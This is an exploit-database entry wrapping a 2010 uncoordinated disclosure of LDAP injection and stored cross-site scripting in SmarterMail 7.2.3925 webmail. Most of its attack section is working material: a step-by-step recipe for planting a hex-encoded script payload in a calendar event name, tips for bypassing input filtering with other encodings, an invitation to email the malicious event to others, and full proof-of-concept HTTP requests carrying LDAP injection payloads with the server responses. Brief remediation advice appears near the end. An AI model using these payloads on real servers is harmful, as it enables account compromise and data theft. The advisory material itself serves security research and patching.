Exploit for php platform in category web applications
{"id": "1337DAY-ID-14318", "type": "zdt", "bulletinFamily": "exploit", "title": "SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2010-10-03T00:00:00", "modified": "2010-10-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/14318", "reporter": "sqlhacker", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-12T03:50:09", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-3486"]}]}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/14318", "sourceData": "=======================================================\r\nSmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability\r\n=======================================================\r\n\r\n########################################################################\r\n# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)\r\n# Date: 2010-10-01\r\n# Author : David Hoyt (sqlhacker) \u00e2\u20ac\u201c Hoyt LLC\r\n# Contact : [email\u00a0protected]\r\n# Home : http://cloudscan.me\r\n# Dork : insite: SmarterMail Enterprise 7.2\r\n# Bug : LDAP Injection + Cross Site Scripting (STORED)\r\n# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2\r\n# Uncoordinated Disclosure\r\n########################################################################\r\n \r\nABSTRACT\r\n--------------------------\r\nIt is important for application developers to penetration test\r\ntheir products prior to release in order to find potential vulnerabilities\r\nand correct them before fraudsters exploit them.\r\n \r\nDISCLOSURE PURPOSE\r\n--------------------------\r\nApplications for wide-scale deployment must be delivered with an exploit\r\nsurface that is manageable.\r\n \r\nDevelopers failing to properly screen applications prior to release are at\r\nrisk of uncoordinated disclosure.\r\n \r\nSECURITY COMMENTS\r\n--------------------------\r\nServer Application developers should explicitly be detailing the exploit\r\nsurface\r\nmodeling performed on an application as part of the software development\r\nlifecycle\r\nprior to and as part of a candidate release.\r\n \r\nSystem Admins need to take a trust-no-one approach when installing Server\r\nand Client Applications for wide-scale deployment.\r\n \r\nENGAGEMENT TOOLS\r\n--------------------------\r\nI am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,\r\nNeXpose, XSS_Rays,\r\nFuzzDB as a baseline set of engagement tools that are being used to perform\r\nthis analysis.\r\n \r\nThis is manual testing.\r\n \r\nDISCUSSION AND ANALYSIS\r\n--------------------------\r\nSmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have\r\naddressed a number of\r\nissues identified in CVE's\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425\r\nand\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486\r\n \r\nThere were a number of Private Advisories provided to Hoyt LLC Clients that\r\nwere not disclosed to the public. It was our assumption that\r\nthe level of detail and specificity would have resulted in a thourough\r\nscrubbing of any patches and release candidates.\r\n \r\nThere are additional exploits to disclose that use a manual, multi-step\r\nprocess to confirm with picture proof.\r\n \r\nThis advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS\r\nInjection vulnerabilities found in SmarterMail 7.x (7.2.3925).\r\nAdditional advisories will be released as we develop a bullet proof audit\r\ntrail.\r\n \r\nFurther advisories will focus on security by obscurity in SmarterMail.\r\n \r\nMy prior work focused on the URL/Parameter Combos that would deliver a Cross\r\nSite Scripting (STORED) exploit.\r\n \r\nMy review seeks to focus on the identified URL/Param combos in SmarterMail\r\n7.1 that were found to be vulnerable but not disclosed to the public\r\nand only available in private advisories to our clients and partners.\r\n \r\n \r\nAUDIT TRAIL + EXPLOIT PATTERN EXAMPLES\r\n \r\n \r\nEXPLOIT #1\r\n--------------------------\r\nLDAP injection and resulting STORED Cross Site Scripting in Events Planner -\r\nSmarterMail 7.x (7.2.3925)\r\n \r\nSummary\r\nSeverity: High\r\nConfidence: Certain\r\nHost: http://vulnerable.smartermail.site:9998\r\nPath: /Main/frmEmptyPreviewOuter.aspx\r\n Multiple Related URL/Parameters (available in private advisory)\r\n \r\nIssue detail\r\nThe type parameter is vulnerable to LDAP injection attacks.\r\n \r\nThe payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each\r\nsubmitted in the type parameter. These two requests resulted in different\r\nresponses, indicating that the input may be being incorporated into a\r\ndisjunctive LDAP query in an unsafe manner.\r\n \r\nIssue Background\r\n-----------------------\r\nLDAP injection arises when user-controllable data is copied in an unsafe way\r\ninto an LDAP query that is performed by the application. If an attacker can\r\ninject LDAP metacharacters into the query, then they can interfere with the\r\nquery's logic. Depending on the function for which the query is used, the\r\nattacker may be able to retrieve sensitive data to which they are not\r\nauthorised, or subvert the application's logic to perform some unauthorised\r\naction.\r\n \r\nNote that automated difference-based tests for LDAP injection flaws can\r\noften be unreliable and are prone to false positive results.\r\n \r\nThe author has manually reviewed the reported requests and responses and\r\nconfirmed a vulnerability is present.\r\n \r\nAll the work presented is manual recon and analysis using the tools listed.\r\n \r\n \r\nStep by Step Process\r\n---------------------------------------------------\r\n \r\nThe steps to create the exploit as as follows:\r\n \r\n-Obtain an end-user SmarterMail 7.x (7.2.3925)\r\n-Login to WebMail, Click Events\r\n \r\nNote - The XSS attack payload can be delivered by creating an Event Group or\r\nan Event Name.\r\n \r\nMy example will create a new event. I know that SmarterMail does some data\r\nsanitization, so I need to test various encoding schemes to get around the\r\nlimited sanity checking.\r\n \r\nTo make this easy to follow along, use URL http://ha.ckers.org/xss.html for\r\nour encoding calculator so the average Joe can leverage this exploit\r\nexample.\r\n \r\nI want to make a simple test to confirm if the URL/Parameters are vulnerable\r\nin the Event Planner of SmarterMail 7.x (7.2.3925).\r\nI'll use a known malicious payload example. Using the encoding calculator, I\r\ninput <\\\\\\/script>alert(0x000170)<\\\\/script>\r\nand for the HEX Value Stored Cross Site Scripting exploit I want to create.\r\n \r\nThe result is\r\n%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E,\r\nthere is your example exploit for Stored XSS.\r\n \r\nTake the result and paste it into the new event name (exploit) you want to\r\ncreate and e-mail around to all your colleages and friends and blog about...\r\n \r\nClick submit and refresh the screen, here is what I \"received\" for a\r\npayload. I provide 2 examples of URL/Parameter manipulation that result in\r\nan event being created.\r\n \r\n** Author Note.. the Blogger parser isn't very good about making me escape\r\nthe nasty XSS below.. so I have to edit the post so readers don't get\r\nXSS'd.. Pictures are a part of the exploit surface model, I also like to\r\npost conclusive, picture proof of an exploit.\r\n \r\nThe picture(s) below provide conclusive evidence of Cross Site Scripting\r\n(STORED) delivered via LDAP Injection.\r\n \r\n \r\nStored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x\r\n(7.2.3925)\r\nLDAP Injection to leverage an XSS attack utilizing the event planner\r\nfeatures of SmarterMail 7.x (7.2.3925)\r\n \r\n \r\nStored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x\r\n(7.2.3925)\r\nLDAP Injection to leverage an XSS attack utilizing the event planner\r\nfeatures of SmarterMail 7.x (7.2.3925)\r\n \r\nThe implication here is that SmarterMail isn't defending against HEX Value\r\nmalicious payloads. This is a \"critical\" exploit finding confirmed in\r\nSmarterMail 7.x (7.2.3925).\r\nYou can keep testing with Decimal or Base 64 and produce results equal to\r\nand likely greater than what I am showing here in public, emphasis on\r\ngreater than what I am showing.\r\n \r\n \r\nIssue Remediation\r\n-------------------\r\nIf possible, applications should avoid copying user-controllable data into\r\nLDAP queries. If this is unavoidable, then the data should be strictly\r\nvalidated to prevent LDAP injection attacks. In most situations, it will be\r\nappropriate to allow only short alphanumeric strings to be copied into\r\nqueries, and any other input should be rejected. At a minimum, input\r\ncontaining any LDAP metacharacters should be rejected; characters that\r\nshould be blocked include ( ) ; , * | & = and whitespace.\r\n \r\n \r\nEXPLOIT Proof of Concept {PoC} - DETAILS\r\n--------------------------------------------\r\n \r\nRequest 1\r\nGET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1\r\nAccept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,\r\napplication/x-ms-application, application/x-ms-xbap,\r\napplication/vnd.ms-xpsdocument, application/xaml+xml, */*\r\nReferer: http://vulnerable.smartermail.site:9998/Default.aspx\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;\r\nTrident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nAccept-Encoding: gzip, deflate\r\nHost: vulnerable.smartermail.site:9998\r\nProxy-Connection: Keep-Alive\r\nCookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;\r\nsettings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;\r\nSTTTState=;\r\nSTHashCookie={\"CountsGuid\":\"1085934378\",\"TopBarSection\":\"UserContacts\"}\r\n \r\n \r\n \r\nResponse 1\r\nHTTP/2.0 200 OK\r\nServer: SmarterTools/2.0.3925.24451\r\nDate: Fri, 01 Oct 2010 22:28:00 GMT\r\nX-AspNet-Version: 2.0.50727\r\nX-Compressed-By: HttpCompress\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nConnection: Close\r\nContent-Length: 5204\r\n \r\n \r\n...[SNIP]...\r\n<![CDATA[\r\nUpdateSidebarCounts('UserSync', 0);\r\n$(function() { if (parent.UpdateCurrentPage)\r\nparent.UpdateCurrentPage('\\x2fMain\\x2ffrmEmptyPreviewOuter\\x2easpx?type\\x3d5faa0382d747b754\\x29\\x28sn\\x253d\\x2a');\r\n});\r\nSys.Application.initialize();\r\n$(function() {\r\nSetTopTitle('No\\x20item\\x20has\\x20been\\x20selected\\x20\\x2d\\x20hoytllc\\x2ecom\\x20\\x2d\\x20SmarterMail');\r\n});\r\n//]]>\r\n</script>\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\n \r\nRequest 2\r\nGET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1\r\nAccept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,\r\napplication/x-ms-application, application/x-ms-xbap,\r\napplication/vnd.ms-xpsdocument, application/xaml+xml, */*\r\nReferer: http://vulnerable.smartermail.site:9998/Default.aspx\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;\r\nTrident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nAccept-Encoding: gzip, deflate\r\nHost: vulnerable.smartermail.site:9998\r\nProxy-Connection: Keep-Alive\r\nCookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;\r\nsettings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;\r\nSTTTState=;\r\nSTHashCookie={\"CountsGuid\":\"1085934378\",\"TopBarSection\":\"UserContacts\"}\r\n \r\n \r\n \r\nResponse 2\r\nHTTP/2.0 200 OK\r\nServer: SmarterTools/2.0.3925.24451\r\nDate: Fri, 01 Oct 2010 22:28:00 GMT\r\nX-AspNet-Version: 2.0.50727\r\nX-Compressed-By: HttpCompress\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nConnection: Close\r\nContent-Length: 5247\r\n \r\n \r\n...[SNIP]...\r\n<![CDATA[\r\nUpdateSidebarCounts('UserEmail', 0);\r\nUpdateSidebarCounts('UserSync', 0);\r\n$(function() { if (parent.UpdateCurrentPage)\r\nparent.UpdateCurrentPage('\\x2fMain\\x2ffrmEmptyPreviewOuter\\x2easpx?type\\x3d5faa0382d747b754\\x29\\x21\\x28sn\\x253d\\x2a');\r\n});\r\nSys.Application.initialize();\r\n$(function() {\r\nSetTopTitle('No\\x20item\\x20has\\x20been\\x20selected\\x20\\x2d\\x20hoytllc\\x2ecom\\x20\\x2d\\x20SmarterMail');\r\n});\r\n//]]>\r\n \r\n \r\n \r\nEXPLOIT #2\r\n--------------------------\r\nDirectory Creation by Fuzzing that results in a STORED Cross Site Scripting\r\nattack.\r\n \r\nThis portion of the research focused on creating direcories that would evade\r\nthe current filtering techniques used my SmarterMail to prevent OS Injection\r\n \r\n \r\n \r\nWORKAROUNDS\r\n--------------------------\r\nSpecifically, URL filtering should be employed against the malicious query\r\nstrings.\r\n \r\n \r\n \r\nREMEDIATION SOLUTION\r\n------------------------\r\n \r\nI'm pushing a quick update to my clients now on this LDAP Injection / Stored\r\nXSS issue..\r\nOur group is studying a remediation solution or additional workarounds that\r\nwill be posted at this URL.\r\n \r\nCalender and Event functionality is not straightforward to implement\r\nsecurely.\r\nSome recommendations to consider in the design of this functionality\r\ninclude:\r\n \r\nValidating Input and a blacklist of strings to hinder this style of attack.\r\n \r\nThere is more to the story.. since I'm just screening applications for\r\nclients, I am pushing out the info as I confirm it manually.\r\n\r\n\n\n# 0day.today [2018-04-12] #", "_state": {"dependencies": 1659889451, "score": 1659766679, "epss": 1678811959}}
SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability